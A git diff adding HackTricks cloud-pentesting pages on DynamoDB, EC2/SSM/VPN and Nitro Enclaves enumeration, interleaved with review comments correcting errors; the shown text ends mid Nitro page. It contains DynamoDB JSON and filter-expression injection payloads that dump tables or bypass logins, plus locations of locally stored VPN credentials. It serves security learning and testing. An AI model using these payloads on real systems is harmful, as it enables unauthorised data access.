+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## DynamoDB + +### Basic Information + +Amazon DynamoDB is presented by AWS as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities. + +In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization. + +### Encryption + +By default, DynamoDB uses a KMS key that \*\*belongs to Amazon DynamoDB,\*\*not even the AWS managed key that at least belongs to your account. + +
+ +### Backups & Export to S3 + +It's possible to **schedule** the generation of **table backups** or create them on **demand**. Moreover, it's also possible to enable **Point-in-time recovery (PITR) for a table.** Point-in-time recovery provides continuous **backups** of your DynamoDB data for **35 days** to help you protect against accidental write or delete operations. + +It's also possible to export **the data of a table to S3**, but the table needs to have **PITR enabled**. + +### GUI + +There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), etc, that could be useful: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin) + +### Enumeration + +```bash +# Tables +aws dynamodb list-tables +aws dynamodb describe-table --table-name #Get metadata info +## The primary key and sort key will appear inside the KeySchema field + +#Check if point in time recovery is enabled +aws dynamodb describe-continuous-backups \ + --table-name tablename + +# Backups +aws dynamodb list-backups +aws dynamodb describe-backup --backup-arn +aws dynamodb describe-continuous-backups --table-name + +# Global tables +aws dynamodb list-global-tables +aws dynamodb describe-global-table --global-table-name + +# Exports +aws dynamodb list-exports +aws dynamodb describe-export --export-arn + +# Misc +aws dynamodb describe-endpoints #Dynamodb endpoints +``` + +### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md" %} +[aws-dynamodb-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md) +{% endcontent-ref %} + +### Privesc + +{% content-ref url="../aws-privilege-escalation/aws-dynamodb-privesc.md" %} 
+[aws-dynamodb-privesc.md](../aws-privilege-escalation/aws-dynamodb-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %} +[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md) +{% endcontent-ref %} + +### Persistence + +{% content-ref url="../aws-persistence/aws-dynamodb-persistence.md" %} +[aws-dynamodb-persistence.md](../aws-persistence/aws-dynamodb-persistence.md) +{% endcontent-ref %} + +## DynamoDB Injection + +### SQL Injection + +There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. + +{% embed url="https://book.hacktricks.xyz/pentesting-web/sql-injection" %} + +### NoSQL Injection + +In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\ +You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API\_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) + +Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**. + +{% hint style="info" %} +Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited). +{% endhint %} + +If you can **change the comparison** performed or add new ones, you could retrieve more data. 
+ +```bash +# Comparators to dump the database +"NE": "a123" #Get everything that doesn't equal "a123" +"NOT_CONTAINS": "a123" #What you think +"GT": " " #All strings are greater than a space +``` + +{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %} + +### Raw Json injection + +{% hint style="danger" %} +**This vulnerability is based on dynamodb Scan Filter which is now deprecated!** +{% endhint %} + +**DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents. + +For example, injecting in a request like: + +{% code overflow="wrap" %} +```bash +'{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}' +``` +{% endcode %} + +an attacker could inject something like: + +`1000"}],"ComparisonOperator": "GT","AttributeValueList": [{"N": "0` + +fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all. 
+ +Another **vulnerable example using a login** could be: + +```python +scan_filter = """{ + "username": { + "ComparisonOperator": "EQ", + "AttributeValueList": [{"S": "%s"}] + }, + "password": { + "ComparisonOperator": "EQ", + "AttributeValueList": [{"S": "%s"}] + } +} +""" % (user_data['username'], user_data['password']) + +dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter)) +``` + +This would be vulnerable to: + +``` +username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none +password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none +``` + +### :property Injection + +Some SDKs allows to use a string indicating the filtering to be performed like: + +{% code overflow="wrap" %} +```java +new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap) +``` +{% endcode %} + +You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**. + +Therefore, a login like the previous one can be bypassed with something like: + +```bash +:username = :username or :username +# This will generate the query: +# :username = :username or :username = :username and Password = :password +# which is always true +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md new file mode 100644 index 0000000000..3ba4235a82 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md @@ -0,0 +1,352 @@ +# AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
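Review bot: the explanation under `Raw Json injection` in the aws-dynamodb-enum.md hunk misdescribes what the injected string does: after concatenation the `Id` object contains `ComparisonOperator` and `AttributeValueList` twice (`EQ`/`1000` followed by `GT`/`0`), so the outcome depends on the JSON parser keeping the last duplicate key, which `json.loads` does; the effective filter is then only `GT 0` and the `EQ 1000` condition is discarded, not kept and combined as the text says. `looking for all the data with a Id string greater and 0` should read `greater than 0`, and the root cause worth stating for readers is that the filter is assembled by string concatenation; building it as a dict and putting user input only in the value position removes the issue for both this example and the `scan_filter` login example below it. Smaller points: the Encryption paragraph has escaped asterisks (`\*\*belongs to Amazon DynamoDB,\*\*not even`) that break the bold and drop a space; `in the primary key to works` → `to work`; `aws dynamodb describe-continuous-backups` appears twice in the Enumeration block; `Raw Json injection` → `Raw JSON injection`; and for the `:property Injection` example the mitigation to name is DynamoDB's `ExpressionAttributeNames` (`#name` placeholders) for attribute names instead of concatenating `user_input` into the filter expression.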
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## VPC & Networking + +Learn what a VPC is and about its components in: + +{% content-ref url="aws-vpc-and-networking-basic-information.md" %} +[aws-vpc-and-networking-basic-information.md](aws-vpc-and-networking-basic-information.md) +{% endcontent-ref %} + +## EC2 + +Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions. + +Interesting things to enumerate in EC2: + +* Virtual Machines + * SSH Keys + * User Data + * Existing EC2s/AMIs/Snapshots +* Networking + * Networks + * Subnetworks + * Public IPs + * Open ports +* Integrated connections with other networks outside AWS + +### Instance Profiles + +Using **roles** to grant permissions to applications that run on **EC2 instances** requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications. + +This extra step is the **creation of an** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) attached to the instance. The **instance profile contains the role and** can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. 
Note that **only one role can be assigned to an EC2 instance** at a time, and all applications on the instance share the same role and permissions. + +### Metadata Endpoint + +AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname. + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} + +### Enumeration + +```bash +# Get EC2 instances +aws ec2 describe-instances +aws ec2 describe-instance-status #Get status from running instances + +# Get user data from each ec2 instance +for instanceid in $(aws ec2 describe-instances --profile --region us-west-2 | grep -Eo '"i-[a-zA-Z0-9]+' | tr -d '"'); do + echo "Instance ID: $instanceid" + aws ec2 describe-instance-attribute --profile --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d + echo "" + echo "-------------------" +done + +# Instance profiles +aws iam list-instance-profiles +aws iam list-instance-profiles-for-role --role-name + +# Get tags +aws ec2 describe-tags + +# Get volumes +aws ec2 describe-volume-status +aws ec2 describe-volumes + +# Get snapshots +aws ec2 describe-snapshots --owner-ids self + +# Scheduled instances +aws ec2 describe-scheduled-instances + +# Get custom images +aws ec2 describe-images --owners self + +# Get Elastic IPs +aws ec2 describe-addresses + +# Get current output +aws ec2 get-console-output --instance-id [id] + +# Get VPN customer gateways +aws ec2 describe-customer-gateways +aws ec2 describe-vpn-gateways +aws ec2 describe-vpn-connections + +# List conversion tasks to upload/download VMs +aws ec2 describe-conversion-tasks +aws ec2 describe-import-image-tasks + +# Get Bundle Tasks +aws ec2 
describe-bundle-tasks + +# Get Classic Instances +aws ec2 describe-classic-link-instances + +# Get Dedicated Hosts +aws ec2 describe-hosts + +# Get SSH Key Pairs +aws ec2 describe-key-pairs + +# Get Internet Gateways +aws ec2 describe-internet-gateways + +# Get NAT Gateways +aws ec2 describe-nat-gateways + +# Get subnetworks +aws ec2 describe-subnets + +# Get FW rules +aws ec2 describe-network-acls + +# Get security groups +aws ec2 describe-security-groups + +# Get interfaces +aws ec2 describe-network-interfaces + +# Get routes table +aws ec2 describe-route-tables + +# Get VPCs +aws ec2 describe-vpcs +aws ec2 describe-vpc-peering-connections +``` + +### Unauthenticated Access + +{% content-ref url="../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md" %} +[aws-ec2-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md) +{% endcontent-ref %} + +### Privesc + +In the following page you can check how to **abuse EC2 permissions to escalate privileges**: + +{% content-ref url="../../aws-privilege-escalation/aws-ec2-privesc.md" %} +[aws-ec2-privesc.md](../../aws-privilege-escalation/aws-ec2-privesc.md) +{% endcontent-ref %} + +### Post-Exploitation + +{% content-ref url="../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/" %} +[aws-ec2-ebs-ssm-and-vpc-post-exploitation](../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/) +{% endcontent-ref %} + +## EBS + +Amazon **EBS** (Elastic Block Store) **snapshots** are basically static **backups** of AWS EBS volumes. In other words, they are **copies** of the **disks** attached to an **EC2** Instance at a specific point in time. EBS snapshots can be copied across regions and accounts, or even downloaded and run locally. + +Snapshots can contain **sensitive information** such as **source code or APi keys**, therefore, if you have the chance, it's recommended to check it. 
+ +### Difference AMI & EBS + +An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is used to **backup and recover data stored on an EBS volume**. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application. + +### Privesc + +In the following page you can check how to **abuse EBS permissions to escalate privileges**: + +{% content-ref url="../../aws-privilege-escalation/aws-ebs-privesc.md" %} +[aws-ebs-privesc.md](../../aws-privilege-escalation/aws-ebs-privesc.md) +{% endcontent-ref %} + +## SSM + +**Amazon Simple Systems Manager (SSM)** allows to remotely manage floats of EC2 instances to make their administrations much more easy. Each of these instances need to be running the **SSM Agent service as the service will be the one getting the actions and performing them** from the AWS API. + +**SSM Agent** makes it possible for Systems Manager to update, manage, and configure these resources. The agent **processes requests from the Systems Manager service in the AWS Cloud**, and then runs them as specified in the request. + +The **SSM Agent comes**[ **preinstalled in some AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) or you need to [**manually install them**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) on the instances. Also, the IAM Role used inside the instance needs to have the policy **AmazonEC2RoleforSSM** attached to be able to communicate. 
+ +### Enumeration + +```bash +aws ssm describe-instance-information +aws ssm describe-parameters +aws ssm describe-sessions --state [Active|History] +aws ssm describe-instance-patches --instance-id +aws ssm describe-instance-patch-states --instance-ids +aws ssm describe-instance-associations-status --instance-id +``` + +You can check in an EC2 instance if Systems Manager is runnign just by executing: + +```bash +ps aux | grep amazon-ssm +``` + +### Privesc + +In the following page you can check how to **abuse SSM permissions to escalate privileges**: + +{% content-ref url="../../aws-privilege-escalation/aws-ssm-privesc.md" %} +[aws-ssm-privesc.md](../../aws-privilege-escalation/aws-ssm-privesc.md) +{% endcontent-ref %} + +## ELB + +**Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands. + +### Enumeration + +```bash +# List internet-facing ELBs +aws elb describe-load-balancers +aws elb describe-load-balancers | jq '.LoadBalancerDescriptions[]| select( .Scheme | contains("internet-facing"))|.DNSName' + +# DONT FORGET TO CHECK VERSION 2 +aws elbv2 describe-load-balancers +aws elbv2 describe-load-balancers | jq '.LoadBalancers[].DNSName' +aws elbv2 describe-listeners --load-balancer-arn +``` + +## Launch Templates & Autoscaling Groups + +### Enumeration + +{% code overflow="wrap" %} +```bash +# Launch templates +aws ec2 describe-launch-templates +aws ec2 describe-launch-templates --launch-template-id +## Get details, like user data +aws ec2 describe-launch-template-versions --launch-template-id + +# Autoscaling +aws autoscaling describe-auto-scaling-groups +aws autoscaling describe-auto-scaling-instances +aws autoscaling describe-launch-configurations +aws autoscaling describe-load-balancer-target-groups +aws autoscaling describe-load-balancers +``` +{% endcode %} + +## Nitro + +AWS Nitro is a suite of 
**innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture. + +Get more information and how to enumerate it from: + +{% content-ref url="aws-nitro-enum.md" %} +[aws-nitro-enum.md](aws-nitro-enum.md) +{% endcontent-ref %} + +## VPN + +A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **workers laptops (Client VPN)** with a **AWS VPC** so services can accessed without needing to expose them to the internet. + +#### Basic AWS VPN Components + +1. **Customer Gateway**: + * A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. + * It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. + * You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. + * It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. +2. **Virtual Private Gateway**: + * A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. + * It is attached to your VPC and serves as the target for your VPN connection. + * VPG is the AWS side endpoint for the VPN connection. 
+ * It handles the secure communication between your VPC and your on-premises network. +3. **Site-to-Site VPN Connection**: + * A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. + * This type of connection requires a Customer Gateway and a Virtual Private Gateway. + * It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. + * Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. +4. **Client VPN Endpoint**: + * A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. + * It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. + * It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. + * With Client VPN, each client device uses a VPN client software to establish a secure connection. + +You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn). + +### Enumeration + +```bash +# VPN endpoints +## Check used subnetwork, authentication, SGs, connected... 
+aws ec2 describe-client-vpn-endpoints + +## Get AWS network info related to the vpn endpoint +aws ec2 describe-client-vpn-target-networks --client-vpn-endpoint-id + +## Get AWS subnet & ip range the VPN iconnected to +aws ec2 describe-client-vpn-routes --client-vpn-endpoint-id + +## Check authorization rules +aws ec2 describe-client-vpn-authorization-rules --client-vpn-endpoint-id + +## Get current connections to the VPN endpoint +aws ec2 describe-client-vpn-connections --client-vpn-endpoint-id + +# Get VPN gateways and check with which VPC each is connected +aws ec2 describe-vpn-gateways + +# Get VPN site-to-site connections +aws ec2 describe-vpn-connections +``` + +### Local Enumeration + +**Local Temporary Credentials** + +When AWS VPN Client is used to connect to a VPN, the user will usually **login in AWS** to get access to the VPN. Then, some **AWS credentials are created and stored** locally to establish the VPN connection. These credentials are **stored in** `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` and contains an **AccessKey**, a **SecretKey** and a **Token**. + +The credentials belong to the user `arn:aws:sts:::assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: research more about the permissions of this credentials). + +**opvn config files** + +If a **VPN connection was stablished** you should search for **`.opvn`** config files in the system. 
Moreover, one place where you could find the **configurations** is in **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`** + +#### **Post Exploitaiton** + +{% content-ref url="../../aws-post-exploitation/aws-vpn-post-exploitation.md" %} +[aws-vpn-post-exploitation.md](../../aws-post-exploitation/aws-vpn-post-exploitation.md) +{% endcontent-ref %} + +## References + +* [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md new file mode 100644 index 0000000000..2e40121dfb --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md @@ -0,0 +1,306 @@ +# AWS - Nitro Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
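Review bot: the user-data loop in the EC2 Enumeration block of this README.md hunk does not run as written: `--profile --region us-west-2` leaves `--profile` without a value, so the CLI rejects the command, and the hard-coded `us-west-2` is inconsistent with every other command on the page; drop `--profile` or use a `<profile>` placeholder, and `jq -r ".UserData.Value"` makes the `tr -d '"'` step unnecessary. Other points: `AmazonEC2RoleforSSM` is the legacy managed policy, and the one AWS currently recommends for agent communication is `AmazonSSMManagedInstanceCore`, so say so or readers will attach the wrong policy; the path `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` and the ARN `arn:aws:sts:::assumed-role/...` both have empty segments where a placeholder was lost, and the `(TODO: research more about the permissions of this credentials)` remark is still in the text; `.opvn` (in the sub-heading and in the sentence after it) should be `.ovpn`. Typos and grammar: `floats of EC2 instances` → `fleets`, `make their administrations much more easy` → `make their administration much easier`, `runnign`, `stablished`, `iconnected`, `Post Exploitaiton`, `so services can accessed` → `so services can be accessed`, `with a AWS VPC` → `with an AWS VPC`.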
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture. + +### Nitro Enclaves + +**AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards. + +{% hint style="danger" %} +Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not. +{% endhint %} + +## Nitro Enclave CLI installation + +Follow the all instructions [**from the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). 
However, these are the most important ones: + +```bash +# Install tools +sudo amazon-linux-extras install aws-nitro-enclaves-cli -y +sudo yum install aws-nitro-enclaves-cli-devel -y + +# Config perms +sudo usermod -aG ne $USER +sudo usermod -aG docker $USER + +# Check installation +nitro-cli --version + +# Start and enable the Nitro Enclaves allocator service. +sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service +``` + +## Nitro Enclave Images + +The images that you can run in Nitro Enclave are based on docker images, so you can create your Nitro Enclave images from docker images like: + +```bash +# You need to have the docker image accesible in your running local registry +# Or indicate the full docker image URL to access the image +nitro-cli build-enclave --docker-uri : --output-file nitro-img.eif +``` + +As you can see the Nitro Enclave images use the extension **`eif`** (Enclave Image File). + +The output will look similar to: + +``` +Using the locally available Docker image... +Enclave Image successfully created. +{ + "Measurements": { + "HashAlgorithm": "Sha384 { ... }", + "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284", + "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f", + "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3" + } +} +``` + +### Run an Image + +As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), in order to run an enclave image you need to assign it memory of **at least 4 times the size of the `eif` file**. 
It's possible to configure the default resources to give to it in the file + +```shell +/etc/nitro_enclaves/allocator.yaml +``` + +{% hint style="danger" %} +Always remember that you need to **reserve some resources for the parent EC2** instance also! +{% endhint %} + +After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with: + +{% code overflow="wrap" %} +```shell +# Restart the service so the new default values apply +sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service + +# Indicate the CPUs and memory to give +nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-mode --enclave-cid 16 +``` +{% endcode %} + +### Enumerate Enclaves + +If you compromise and EC2 host it's possible to get a list of running enclave images with: + +```bash +nitro-cli describe-enclaves +``` + +It's **not possible to get a shell** inside a running enclave image because thats the main purpose of enclave, however, if you used the parameter **`--debug-mode`**, it's possible to get the **stdout** of it with: + +```shell +ENCLAVE_ID=$(nitro-cli describe-enclaves | jq -r ".[0].EnclaveID") +nitro-cli console --enclave-id ${ENCLAVE_ID} +``` + +### Terminate Enclaves + +If an attacker compromise an EC2 instance by default he won't be able to get a shell inside of them, but he will be able to **terminate them** with: + +```shell +nitro-cli terminate-enclave --enclave-id ${ENCLAVE_ID} +``` + +## Vsocks + +The only way to communicate with an **enclave** running image is using **vsocks**. + +**Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. 
This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments. + +{% hint style="success" %} +Therefore, an vsock address looks like this: `:` +{% endhint %} + +To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**: + +
nitro-cli describe-enclaves
+
+[
+  {
+    "EnclaveName": "secure-channel-example",
+    "EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
+    "ProcessID": 10131,
+    "EnclaveCID": 16,
+    "NumberOfCPUs": 2,
+    "CPUIDs": [
+      1,
+      3
+    ],
+    "MemoryMiB": 1024,
+    "State": "RUNNING",
+    "Flags": "DEBUG_MODE",
+    "Measurements": {
+      "HashAlgorithm": "Sha384 { ... }",
+      "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+      "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+      "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+    }
+  }
+]
+
